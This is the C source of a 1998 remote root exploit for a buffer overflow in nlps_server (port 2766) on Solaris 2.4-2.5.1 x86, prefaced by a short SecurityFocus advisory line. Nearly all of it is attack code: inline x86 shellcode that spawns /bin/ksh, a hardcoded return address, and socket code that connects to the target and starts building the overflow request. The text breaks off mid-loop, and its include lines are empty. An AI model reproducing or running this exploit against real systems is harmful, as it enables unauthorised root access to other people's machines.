// source: https://www.securityfocus.com/bid/2319/info Solaris 2.4, 2.5, and 2.51 x86 are vulnerable to a buffer overflow in nlps_server, a process residing on port 2766 when installed. Attackers can exploit this buffer overflow to gain remote root access. /*## copyright LAST STAGE OF DELIRIUM apr 1998 poland *://lsd-pl.net/ #*/ /*## listen/nlps_server #*/ #include #include #include #include #include #include #include #include #define ADRNUM 256 #define NOPNUM 64+46+7+4 char adr[4]="\x30\x79\x04\x08"; char shellcode[]= "\xeb\x1b" /* jmp */ "\x33\xd2" /* xorl %edx,%edx */ "\x58" /* popl %eax */ "\x8d\x78\x14" /* leal 0x14(%eax),edi */ "\x52" /* pushl %edx */ "\x57" /* pushl %edi */ "\x50" /* pushl %eax */ "\xab" /* stosl %eax,%es:(%edi) */ "\x92" /* xchgl %eax,%edx */ "\xab" /* stosl %eax,%es:(%edi) */ "\x88\x42\x08" /* movb %al,0x8(%edx) */ "\x83\xef\x3c" /* subl $0x3c,%edi */ "\xb0\x9a" /* movb $0x9a,%al */ "\xab" /* stosl %eax,%es:(%edi) */ "\x47" /* incl %edi */ "\xb0\x07" /* movb $0x7,%al */ "\xab" /* stosl %eax,%es:(%edi) */ "\xb0\x3b" /* movb $0x3b,%al */ "\xe8\xe0\xff\xff\xff" /* call */ "/bin/ksh" ; main(int argc,char **argv){ char buffer[1024],*b; int sck,i; struct sockaddr_in address; struct hostent *hp; printf("copyright LAST STAGE OF DELIRIUM apr 1998 poland //lsd-pl.net/\n"); printf("listen/nlps_server for solaris 2.4 2.5 2.5.1 x86\n\n"); if(argc!=2){ printf("usage: %s address\n",argv[0]);exit(1); } sck=socket(AF_INET,SOCK_STREAM,0); bzero(&address,sizeof(address)); address.sin_family=AF_INET; address.sin_port=htons(2766); if((address.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if((hp=gethostbyname(argv[1]))==NULL){ printf("error: address.\n");exit(-1); } memcpy(&address.sin_addr.s_addr,hp->h_addr,4); } if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){ perror("error");exit(-1); } sprintf(buffer,"NLPS:002:002:"); b=&buffer[13]; for(i=0;i